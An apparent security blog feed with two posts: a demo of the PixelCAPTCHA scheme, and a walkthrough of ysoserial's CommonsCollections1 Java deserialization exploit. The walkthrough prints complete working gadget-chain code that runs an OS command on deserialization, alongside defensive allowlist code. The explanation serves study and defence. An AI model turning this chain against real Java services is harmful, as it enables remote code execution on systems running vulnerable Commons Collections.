Random Security, a blog by Gursev Singh Kalra
I Click Therefore I Am - PixelCAPTCHA Demo App (published 2017-07-13)<div dir="ltr" style="text-align: left;" trbidi="on">
TL; DR - Everyone hates CAPTCHAs! So do I. But I wrote a new one anyway :p. It's a visual CAPTCHA scheme that can be solved with 2-4 mouse clicks and is named PixelCAPTCHA.<br />
<br />
Here are the links to a borderline ugly <a href="https://pixelcaptcha.info/" target="_blank">demo web application</a> (I like to think it's borderline), a detailed <a href="https://github.com/gursev/whitepapers/blob/master/PixelCAPTCHA_Whitepaper.pdf" target="_blank">white paper</a> (you may like it) and its Java <a href="https://github.com/salesforce/pixel-captcha-project" target="_blank">source code</a> (with gory Maths - you've been warned).<br />
<br />
<span style="font-size: large;">Long Story</span><br />
This post is to talk about a fancy kid in the CAPTCHA town that now happens to have a demo web app for you to play with. It was first demo'ed at BlackHat USA Arsenal. Its source code has been available for a while, but I finally got around to creating a demo web app and wanted to share it via this blog so that the security and developer community can play around and share feedback.<br />
<br />
<br />
<span style="font-size: large;">The Demo Web Application</span><br />
To solve a CAPTCHA, you need to find the black characters that match the blue ones and hit submit. If you accidentally select a wrong character, you can use the 'Clear Selection' button to clear your selection. I should point out that a CAPTCHA is good for only one use. If you submit a wrong solution once, attempts to solve the same CAPTCHA again will result in an error message.<br />
<br />
The demo web application has several components to it. It allows you to generate and solve new CAPTCHAs and try out different CAPTCHA configurations. At the backend, the demo application uses the open source CAPTCHA <a href="https://github.com/salesforce/pixel-captcha-project" target="_blank">library</a>.<br />
<br />
When you visit the demo app for the first time, the default CAPTCHA configuration is used, which you can change by providing a new configuration. The default configuration has:<br />
<ul style="text-align: left;">
<li>Horizontal CAPTCHAs</li>
<li>Two challenge characters </li>
<li>Ten response characters to choose from</li>
<li>The characters used to draw the CAPTCHA are chosen from the 0-255 Unicode code point range</li>
<li>Unordered solution</li>
</ul>
<div>
The image below shows an example solved CAPTCHA with default configuration.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvmN_y-cbm5QgyAJuy3449FSYLdY7MUiTnQXxeVg7S3-wU1JuNES0cRjOO6Q-IkutvbEOxZJ-sI9e8CC4n_TiSUFcZ8VcsqzKRv6pZ5Mzy_SG-6dosH-9IVZbOcNqF1Vv3tkCz5-IKxaaV/s1600/main_screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="968" data-original-width="1600" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvmN_y-cbm5QgyAJuy3449FSYLdY7MUiTnQXxeVg7S3-wU1JuNES0cRjOO6Q-IkutvbEOxZJ-sI9e8CC4n_TiSUFcZ8VcsqzKRv6pZ5Mzy_SG-6dosH-9IVZbOcNqF1Vv3tkCz5-IKxaaV/s400/main_screenshot.png" width="400" /></a></div>
<br />
<br /></div>
<span style="font-size: large;">The Three Control Buttons</span><br />
You will see three buttons under the CAPTCHA image which let you perform the actions as described below:<br />
<br />
<ol style="text-align: left;">
<li><b>New Captcha</b> - The New Captcha button loads a new CAPTCHA for you to try out</li>
<li><b>Submit Solution</b> - Once you are confident that you have solved the CAPTCHA correctly, you can submit the solution to the server for validation. A CAPTCHA solution can be submitted to the server only once with the 'Submit Solution' button. Any additional attempts result in an error.</li>
<li><b>Clear Selection</b> - If you have not yet submitted the CAPTCHA solution to the server, you can use this option as many times as you like. When you need to change your solution, click this button to clear your selection and reload the same CAPTCHA. This option is useful only if it is exercised before the CAPTCHA solution is submitted to the server.</li>
</ol>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Message Box</span><br />
The text in the bottom right box displays information about your most recent actions. The text color legend and some example messages are provided below.<br />
<ul style="text-align: left;">
<li><b style="font-weight: bold;"><span style="color: blue;">Blue</span></b> color indicates CAPTCHA configuration updates. The image below shows a CAPTCHA configuration.</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG8dqjHWMqx_bfkdMgLm5C-7pBw3r7fBR6vFz_sHLo08c1A0xTJUyCQ_FECiJ0qipMRf0KiFBqHU5HRNiwHGGmb8IrnYHV5AlgHGA0IVsvxzhgap8ctaK_N30IYxkFpxNc3IZZgXicY_JY/s1600/blue_color.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="489" data-original-width="832" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG8dqjHWMqx_bfkdMgLm5C-7pBw3r7fBR6vFz_sHLo08c1A0xTJUyCQ_FECiJ0qipMRf0KiFBqHU5HRNiwHGGmb8IrnYHV5AlgHGA0IVsvxzhgap8ctaK_N30IYxkFpxNc3IZZgXicY_JY/s400/blue_color.png" width="400" /></a></div>
<div>
<br /></div>
<ul style="text-align: left;">
<li><b style="font-weight: bold;"><span style="color: #6aa84f;">Green</span></b> color indicates that a correct CAPTCHA solution was provided. The image below shows that a correct CAPTCHA solution was provided.</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgykGCiK91L_UCNR2bzANqMW7EDQ0U6U8jXpw_iiPPk0DQtmfD4wIyXfFNGIw0laXqGIoOT0iaf_oUw9cVv4gjwGPA-0ofEzIMtvaEBw6JS6ZYD46bQ-decwImOigZ6aAle8Tqu4r8Opmay/s1600/green_color.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="424" data-original-width="840" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgykGCiK91L_UCNR2bzANqMW7EDQ0U6U8jXpw_iiPPk0DQtmfD4wIyXfFNGIw0laXqGIoOT0iaf_oUw9cVv4gjwGPA-0ofEzIMtvaEBw6JS6ZYD46bQ-decwImOigZ6aAle8Tqu4r8Opmay/s400/green_color.png" width="400" /></a></div>
<div style="font-weight: bold;">
<br /></div>
<ul style="text-align: left;">
<li><b style="font-weight: bold;"><span style="color: red;">Red</span></b> color indicates that an incorrect CAPTCHA solution was provided. The image below shows the message for a solution that was submitted for a CAPTCHA ID that has either expired or is not present.</li>
</ul>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEe679tdpnHivVEYS3McLXcij3964_Gj0Vkf3yBASk-sAvQeFKdR-WKZkkIe00NZX5zpAOFiKXuPzOjM4-c0MRA5pDiaahbGlkbK6F1DnbSbQhgGZVEQVkP6ngfZHCrPS8FdhuQM_7NxBr/s1600/red_color.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="383" data-original-width="834" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEe679tdpnHivVEYS3McLXcij3964_Gj0Vkf3yBASk-sAvQeFKdR-WKZkkIe00NZX5zpAOFiKXuPzOjM4-c0MRA5pDiaahbGlkbK6F1DnbSbQhgGZVEQVkP6ngfZHCrPS8FdhuQM_7NxBr/s400/red_color.png" width="400" /></a></div>
<br /></div>
<div>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Different CAPTCHA Configurations</span><br />
When you select a new value from any dropdown, a new CAPTCHA configuration will be set on the server and the on-screen CAPTCHA will be refreshed with the new configuration. The instructions at the top of the page are also updated based on the challenge character count. I'll briefly explain different configuration options that you can try out on the <a href="https://pixelcaptcha.info/">demo application</a>.<br />
<br />
<ol style="text-align: left;">
<li><b>Challenge Count</b> - Changing this value sets the total number of challenge characters. It can take 2, 3 or 4 as a valid value. For example, if you set it to 4, you will see 4 blue characters and you will need to choose four black characters similar to the blue challenge characters.</li>
<li><b>Response Count</b> - Changing this value sets the total number of response characters to choose from. It can take 10, 11 or 12 as a valid value.</li>
<li><b>CAPTCHA Orientation</b> - You can generate vertical or horizontal CAPTCHAs for different types of target screen. A vertical CAPTCHA may be more suitable for mobile devices; a horizontal CAPTCHA may be more suitable for desktops.</li>
<li><b>Unicode Code Point Range</b> - This allows you to provide the Unicode code point range to choose from. The default value is 0-255. However, you can choose 0-4095 or 0-65535 to pick the challenge and response characters from a larger character space. The <a href="https://github.com/salesforce/pixel-captcha-project">library</a> also allows you to provide arbitrary comma-separated code points.</li>
<li><b>Ordered Clicks</b> - When set to true, the CAPTCHA solution should follow the order in which the challenge characters appear in the CAPTCHA. For horizontal CAPTCHA, find the topmost challenge character among the response characters and click on it first, then move to the second from top, and so on. For vertical CAPTCHA, find the leftmost challenge character among the response characters and click on it, and so on.</li>
</ol>
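The single-use rule and the ordered/unordered option described above are server-side properties: the server must remember which response characters match the challenge, compare the submitted clicks against them, and discard the entry after the first attempt regardless of the outcome. The class below is an illustration added here; it is not the pixel-captcha library's own code or API, and the identifiers (CaptchaSolutionStore, register, verify) and the sample click indexes are assumptions made for this example. A solution is modelled as the list of indexes of the response characters the user clicked.

```java
import java.time.Duration;
import java.time.Instant;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.UUID;

/*
 * Hypothetical server-side bookkeeping for a click-based CAPTCHA (illustration written
 * for this post; not the pixel-captcha library's API). Each issued CAPTCHA id maps to the
 * expected solution, is valid for one verification attempt only, and expires after a TTL.
 */
public class CaptchaSolutionStore {

    public enum Result { CORRECT, INCORRECT, UNKNOWN_OR_EXPIRED }

    private static final class Pending {
        final List<Integer> solution;  // response-character indexes matching the challenge, in challenge order
        final boolean ordered;         // must the clicks follow the challenge order?
        final Instant expiresAt;

        Pending(List<Integer> solution, boolean ordered, Instant expiresAt) {
            this.solution = solution;
            this.ordered = ordered;
            this.expiresAt = expiresAt;
        }
    }

    private final Map<String, Pending> pending = new HashMap<>();
    private final Duration ttl;

    public CaptchaSolutionStore(Duration ttl) {
        this.ttl = ttl;
    }

    /** Registers the expected solution of a freshly generated CAPTCHA and returns its id. */
    public synchronized String register(List<Integer> solution, boolean ordered) {
        // Evict entries that expired without ever being answered, so the store cannot grow unbounded.
        Instant now = Instant.now();
        pending.values().removeIf(p -> now.isAfter(p.expiresAt));
        String id = UUID.randomUUID().toString();
        pending.put(id, new Pending(new ArrayList<>(solution), ordered, now.plus(ttl)));
        return id;
    }

    /**
     * Verifies a submitted solution exactly once. The entry is removed on the first attempt
     * whether or not the answer is right, so a second submission for the same id, and any
     * submission for an expired or never-issued id, is reported as UNKNOWN_OR_EXPIRED.
     */
    public synchronized Result verify(String id, List<Integer> clicks) {
        Pending p = pending.remove(id);
        if (p == null || Instant.now().isAfter(p.expiresAt)) {
            return Result.UNKNOWN_OR_EXPIRED;
        }
        if (clicks.size() != p.solution.size()) {
            return Result.INCORRECT;
        }
        List<Integer> expected = new ArrayList<>(p.solution);
        List<Integer> given = new ArrayList<>(clicks);
        if (!p.ordered) {
            // Unordered mode: only the set of clicked characters matters, not the click order.
            Collections.sort(expected);
            Collections.sort(given);
        }
        return expected.equals(given) ? Result.CORRECT : Result.INCORRECT;
    }

    public static void main(String[] args) {
        CaptchaSolutionStore store = new CaptchaSolutionStore(Duration.ofMinutes(2));

        // Default configuration: two challenge characters, unordered clicks.
        String unordered = store.register(Arrays.asList(7, 2), false);
        System.out.println("unordered, reversed clicks: " + store.verify(unordered, Arrays.asList(2, 7)));
        System.out.println("same id submitted again:    " + store.verify(unordered, Arrays.asList(2, 7)));

        // Ordered clicks: the same characters in the wrong order fail, and the failed
        // attempt consumes the CAPTCHA, so retrying with the right order is refused too.
        String ordered = store.register(Arrays.asList(7, 2), true);
        System.out.println("ordered, reversed clicks:   " + store.verify(ordered, Arrays.asList(2, 7)));
        System.out.println("ordered, retry in order:    " + store.verify(ordered, Arrays.asList(7, 2)));

        System.out.println("unknown id:                 " + store.verify("no-such-id", Arrays.asList(1, 2)));
    }
}
```

The important design choice is that `verify` removes the entry before it inspects the answer: a wrong guess, a correct answer and an expired id all consume the CAPTCHA, which is what prevents a client from replaying one solved challenge or guessing against the same challenge repeatedly. Compile with a JDK 8 or later and run the class to see the five outcomes in order.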
<div>
<span style="font-size: large;"><br /></span></div>
<div>
<span style="font-size: large;">A Few Example CAPTCHAs and The Corresponding Configuration</span></div>
<div>
<ul style="text-align: left;">
<li>Image shows a horizontal CAPTCHA with 4 challenge characters, 10 response characters and unicode character range 0-4095</li>
</ul>
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh5Do6fwuDnmYZ4Vil0kvZEJBRtzN5zUVX_pdD0hnBtbCnJRIKIbVPoz4E1u30koV1b1y10DC1YwNcZ_zHYc2fD0l0Y95UfWSG8-Qdgz-69Ktc9XZBq1X7UUtxZsEXLoLf4ceSUmY-kd8u/s1600/horizontal_0-4095_4x10.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="767" data-original-width="1600" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh5Do6fwuDnmYZ4Vil0kvZEJBRtzN5zUVX_pdD0hnBtbCnJRIKIbVPoz4E1u30koV1b1y10DC1YwNcZ_zHYc2fD0l0Y95UfWSG8-Qdgz-69Ktc9XZBq1X7UUtxZsEXLoLf4ceSUmY-kd8u/s400/horizontal_0-4095_4x10.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<ul>
<li>Image shows a vertical CAPTCHA with 2 challenge characters, 10 response characters and unicode character range 0-4095</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgUoSeUago4n6zrtZ3JdqJep5AwPCKtL9QlE3rEsSPhy_Y6vN_jEgs7bdAvdoV0IHluECMSdu32IQOY-g6tdho727urXdOpaieWQmIvNd4qfLdMbnL-IorxqYmn0nXv7r0xWwE8EPXTiti/s1600/vertical_0-4095_2x10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="795" data-original-width="1600" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgUoSeUago4n6zrtZ3JdqJep5AwPCKtL9QlE3rEsSPhy_Y6vN_jEgs7bdAvdoV0IHluECMSdu32IQOY-g6tdho727urXdOpaieWQmIvNd4qfLdMbnL-IorxqYmn0nXv7r0xWwE8EPXTiti/s400/vertical_0-4095_2x10.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<ul>
<li>Image shows a CAPTCHA with 4 challenge characters, 12 response characters to choose from and unicode character range 0-65535</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghdCQgGw2Uw3EysibzrfaiM7vslHOB-RSKZgVHGIMLZtYhyphenhyphenZ1L9UGg0dbBYKIHPjTSoc3o8wgJYr7P5FTVr8CE_Z-9GSTPQKApx0xJVU6JwYjMJhZNkabi73MmOcAucphNHU467PoM68AW/s1600/horizontal_0-65535_4x12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="743" data-original-width="1600" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghdCQgGw2Uw3EysibzrfaiM7vslHOB-RSKZgVHGIMLZtYhyphenhyphenZ1L9UGg0dbBYKIHPjTSoc3o8wgJYr7P5FTVr8CE_Z-9GSTPQKApx0xJVU6JwYjMJhZNkabi73MmOcAucphNHU467PoM68AW/s400/horizontal_0-65535_4x12.png" width="400" /></a></div>
</div>
<div>
<br /></div>
<div>
I look forward to your feedback. Please feel free to leave feedback here, log bugs on GitHub or reach out to me directly. Thank you!</div>
</div>
<br /></div>
Understanding ysoserial's CommonsCollections1 exploit (published 2016-01-01, updated 2016-01-02)<div dir="ltr" style="text-align: left;" trbidi="on">
Last year, <a href="https://github.com/frohoff/ysoserial" target="_blank">ysoserial</a> was released by <a href="https://twitter.com/frohoff" target="_blank">frohoff</a> and <a href="https://twitter.com/gebl" target="_blank">gebl</a>. It is a fantastic piece of work. The tool provides options to generate several different types of serialized objects which, when deserialized, can result in arbitrary code execution if the right classes are present in the classpath. In this blog post, I will discuss the <a href="https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java" target="_blank">CommonsCollections1</a> exploit available in the ysoserial toolkit and how it works.<br />
<br />
<b>All code snippets used in this post are sourced from ysoserial</b><br />
<br />
<b><span style="font-size: large;">An Overview</span></b><br />
The CommonsCollections1 exploit builds a custom AnnotationInvocationHandler object that contains an InvokerTransformer (Apache Commons Collections class) payload, and outputs the serialized object. When the serialized object is deserialized, the code path from AnnotationInvocationHandler's readObject leads to InvokerTransformer's payload, causing code execution.<br />
<br />
The image below shows the custom AnnotationInvocationHandler object used for RCE.<br />
<br />
<br />
<img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEGEDkdm7jJ1DHv4d1BI3g_eOUYAnXaLockpkp8ZpwulwYEZZaoc842xxQ4Elu76OQ8Isr_z5ATfnuUnWoWCFMMhyphenhyphen0zTLItZiVzST0l7n5X4NYr4Fj0y-hsVhEonZ6Usy_8kZ_CC5iBR7K/s400/Serialized_Object_Structure.png" width="400" /><br />
Image 1: The serialized AnnotationInvocationHandler<br />
<br />
<br />
What makes the exploit effective is that it relies only on classes present in Java and Apache Commons Collections. The CommonsCollections1 exploit leverages the following classes from the JDK and Commons Collections.<br />
<br />
<b>From JDK</b><br />
<br />
<ol style="text-align: left;">
<li>AnnotationInvocationHandler</li>
<li>Proxy</li>
<li>Map</li>
<li>Override</li>
<li>InvocationHandler</li>
<li>Runtime</li>
</ol>
<br />
<br />
<b>From Commons Collections:</b><br />
<br />
<ol style="text-align: left;">
<li>LazyMap</li>
<li>Transformer</li>
<li>ChainedTransformer</li>
<li>InvokerTransformer</li>
</ol>
<br />
<br />
So, as long as a Java software stack contains the Apache Commons Collections library (<= 3.2.1), it is vulnerable to remote code execution while deserializing untrusted objects.<br />
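The practical defence on the receiving side is to decide which classes a stream may contain before the JVM instantiates any of them. The look-ahead ObjectInputStream below is an example added here, not code from ysoserial or from this post's original snippets: it overrides resolveClass to enforce an allowlist and resolveProxyClass to refuse dynamic proxies, so both the AnnotationInvocationHandler entry point and the Map proxy used by the chain are rejected before any readObject method runs. The allowlist contents (java.util.HashMap only) and the sample objects are assumptions made for the demo.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

/*
 * Look-ahead deserialization (illustration written for this post). Every class descriptor
 * in the stream is checked against an allowlist before the class is loaded, so a gadget
 * class such as AnnotationInvocationHandler or InvokerTransformer is refused before its
 * readObject can run. Proxies are refused outright because the stream cannot be trusted
 * to describe what a proxy's InvocationHandler will do.
 */
public class SafeObjectInputStream extends ObjectInputStream {

    private final Set<String> allowedClassNames;

    public SafeObjectInputStream(InputStream in, Set<String> allowedClassNames) throws IOException {
        super(in);
        this.allowedClassNames = allowedClassNames;
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        String name = desc.getName();
        if (!allowedClassNames.contains(name)) {
            // Thrown before the class is resolved, so no constructor or readObject is reached.
            throw new InvalidClassException(name, "class is not on the deserialization allowlist");
        }
        return super.resolveClass(desc);
    }

    @Override
    protected Class<?> resolveProxyClass(String[] interfaces) throws IOException, ClassNotFoundException {
        // CommonsCollections1 wraps its LazyMap in a java.lang.reflect.Proxy implementing Map.
        throw new InvalidClassException("java.lang.reflect.Proxy",
                "dynamic proxies are not accepted from untrusted streams");
    }

    public static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static Object deserialize(byte[] bytes, Set<String> allowed) throws IOException, ClassNotFoundException {
        try (SafeObjectInputStream in = new SafeObjectInputStream(new ByteArrayInputStream(bytes), allowed)) {
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Assumed allowlist for the demo: the application only ever expects a HashMap of strings.
        Set<String> allowed = new HashSet<>(Arrays.asList("java.util.HashMap"));

        Map<String, String> expected = new HashMap<>();
        expected.put("user", "alice");
        System.out.println("Accepted: " + deserialize(serialize(expected), allowed));

        // Anything else, even a harmless ArrayList, is refused at the class-descriptor stage.
        try {
            deserialize(serialize(new ArrayList<>(Arrays.asList("x"))), allowed);
        } catch (InvalidClassException e) {
            System.out.println("Rejected: " + e.getMessage());
        }
    }
}
```

Two notes on this approach. First, an allowlist of the types the application actually expects is the durable fix; a denylist of known gadget classes has to be updated every time a new chain is published, and later JDK updates that changed AnnotationInvocationHandler.readObject stopped this particular chain without stopping the others. Second, on JDK 9 and later (and the backport in later JDK 8 updates) the same control is built in as JEP 290 serialization filters, so instead of subclassing you can call `ois.setObjectInputFilter(ObjectInputFilter.Config.createFilter("java.util.HashMap;!*"))`, where the trailing `!*` rejects every class not listed before it.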
<br />
<br />
<span style="font-size: large;"><b>Pre-requisites</b></span><br />
It will be helpful to refer to the following classes and concepts as we work our way to understanding the exploit.<br />
<ol>
<li>Java Serialization and Deserialization mechanisms</li>
<li><a href="https://docs.oracle.com/javase/7/docs/api/java/io/ObjectInputStream.html" target="_blank">ObjectInputStream</a> - including readObject()</li>
<li><a href="https://docs.oracle.com/javase/8/docs/technotes/guides/reflection/proxy.html" target="_blank">Proxy</a></li>
<li><a href="http://www.concretepage.com/java/dynamic-proxy-with-proxy-and-invocationhandler-in-java" target="_blank">InvocationHandler</a></li>
<li><a href="https://www.safaribooksonline.com/library/view/jakarta-commons-cookbook/059600706X/ch04s11.html" target="_blank">Transformer</a></li>
<li><a href="https://www.safaribooksonline.com/library/view/jakarta-commons-cookbook/059600706X/ch05s19.html" target="_blank">LazyMap</a></li>
<li><a href="https://www.safaribooksonline.com/library/view/jakarta-commons-cookbook/059600706X/ch04s12.html" target="_blank">ChainedTransformer</a></li>
<li><a href="http://grepcode.com/file/repository.springsource.com/org.apache.commons/com.springsource.org.apache.commons.collections/3.2.1/org/apache/commons/collections/functors/InvokerTransformer.java" target="_blank">InvokerTransformer</a> - Instances of this class are used to perform the code execution, and we will discuss this in more detail below.</li>
</ol>
Since the InvokerTransformer class is the eventual sink that performs code execution, let us take a closer look at it. An InvokerTransformer constructor takes three parameters:<br />
<ol style="text-align: left;">
<li>The name of the method</li>
<li>The parameter types the method accepts</li>
<li>The parameter values</li>
</ol>
An InvokerTransformer instance accepts an object as input and outputs the transformed object. The transformation is determined by the instantiation parameters. The InvokerTransformer first looks up, on the incoming object's class, a method with the name specified as the first parameter that accepts the parameter types specified as the second parameter. Upon finding a matching method, it invokes that method on the incoming object, passing the parameter values from (3) as arguments. The method's return value becomes the output of the transformation.<br />
<br />
<img border="0" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHwHzEPQuEpoVP3-AX1AK8mwbxgqJC5sNd9QncouGc6s7DjpH2ZvOSwRfFwWHjOb0H21HLP5L2dIJ2MtN6oc4Zy71uOhPcJ_2o5PUcREUGwDrxIBKJGMdZ1U4PDpg6Tvlp1aTj47eOS1UJ/s400/InvokerTransformer.png" width="400" /><br />
Image 2: Shows InvokerTransformer<br />
<br />
<br />
<span style="font-size: large;"><b>Payload Only Execution</b></span><br />
<br />
Assuming you understand how Transformers, ChainedTransformers and LazyMaps work, we will look at CommonsCollections1's payload-only execution using a ChainedTransformer. When you run the class below, it will open a calculator on a Mac.<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<pre style="font-family: Courier New, Courier, monospace; font-size: x-small;">
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

public class CommonsCollections1PayloadOnly {
    public static void main(String... args) {
        String[] command = {"open -a calculator"};
        // Each transformer's output is the next transformer's input
        final Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class), <span style="color: blue;">//(1)</span>
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}
                ), <span style="color: blue;">//(2)</span>
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}
                ), <span style="color: blue;">//(3)</span>
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        command
                ) <span style="color: blue;">//(4)</span>
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        Map map = new HashMap<>();
        Map lazyMap = LazyMap.decorate(map, chainedTransformer);
        lazyMap.get("gursev");  // the key is absent, so LazyMap runs the chain to produce a value
    }
}
</pre>
<br />
The image below shows the execution flow when the chainedTransformer in the code snippet above is executed while setting a value on the lazyMap. The numbers in parentheses correspond to the individual Transformer executions in the code snippet above.<br />
<br />
<br />
<br />
<br />
<img border="0" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqTmHsGUMIB-hcZaQhnt8wBS6n-28zBHvUvWv3TyoGaG_DnIyZ5crxsJjkwpjiNmTNPxV1MghAp_O80SBQqJttPW1kg7RZZmtiHI0vQ1r5X3armLGBLr1F2pMWUD03uPm1kt9yOi5Q2_ef/s400/InvokerTransformer-3.png" width="400" /><br />
Image 3: Shows the chainedTransformer invocation when a value is set on the LazyMap<br />
<br />
<br />
<b><span style="font-size: large;">Putting it all together</span></b><br />
<br />
The code below performs both serialization and deserialization. It also executes the command to open a calculator during the deserialization process.<br />
<ol>
<li>The getEvilObject method creates a Java object that executes arbitrary code when deserialized. The object structure is shown in Image 1.</li>
<li>The serializeToByteArray method serializes the evil object to a byte array.</li>
<li>The deserializeFromByteArray method deserializes the object from the byte array. If the Apache Commons Collections library (<=3.2.1) is present in the classpath, the command also gets executed.</li>
</ol>
<pre style="font-family: Courier New, Courier, monospace; font-size: x-small;">
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

public class CommonsCollections1All {

    public static void main(String... args) throws ClassNotFoundException, IllegalAccessException, InvocationTargetException, InstantiationException, IOException {
        Object evilObject = getEvilObject();
        byte[] serializedObject = serializeToByteArray(evilObject);
        deserializeFromByteArray(serializedObject);
    }

    public static Object getEvilObject() throws ClassNotFoundException, IllegalAccessException, InvocationTargetException, InstantiationException {

        String[] command = {"open -a calculator"};

        // Same four-step chain as CommonsCollections1PayloadOnly
        final Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}
                ),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}
                ),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        command
                )
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        // LazyMap: any get() for an unknown key runs the chain
        Map map = new HashMap<>();
        Map lazyMap = LazyMap.decorate(map, chainedTransformer);

        // Inner AnnotationInvocationHandler backed by the lazyMap, exposed through a Map proxy
        String classToSerialize = "sun.reflect.annotation.AnnotationInvocationHandler";
        final Constructor<?> constructor = Class.forName(classToSerialize).getDeclaredConstructors()[0];
        constructor.setAccessible(true);
        InvocationHandler secondInvocationHandler = (InvocationHandler) constructor.newInstance(Override.class, lazyMap);
        Proxy evilProxy = (Proxy) Proxy.newProxyInstance(CommonsCollections1All.class.getClassLoader(), new Class[] {Map.class}, secondInvocationHandler);

        // Outer AnnotationInvocationHandler: its readObject() calls entrySet() on the proxy (see Image 1)
        InvocationHandler invocationHandlerToSerialize = (InvocationHandler) constructor.newInstance(Override.class, evilProxy);
        return invocationHandlerToSerialize;
    }

    public static void deserializeAndDoNothing(byte[] byteArray) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(byteArray));
        ois.readObject();
    }

    public static byte[] serializeToByteArray(Object object) throws IOException {
        ByteArrayOutputStream serializedObjectOutputContainer = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(serializedObjectOutputContainer);
        objectOutputStream.writeObject(object);
        return serializedObjectOutputContainer.toByteArray();
    }

    public static Object deserializeFromByteArray(byte[] serializedObject) throws IOException, ClassNotFoundException {
        ByteArrayInputStream serializedObjectInputContainer = new ByteArrayInputStream(serializedObject);
        ObjectInputStream objectInputStream = new ObjectInputStream(serializedObjectInputContainer);
        InvocationHandler evilInvocationHandler = (InvocationHandler) objectInputStream.readObject();
        return evilInvocationHandler;
    }
}
</pre>
<br />
<br />
<br />
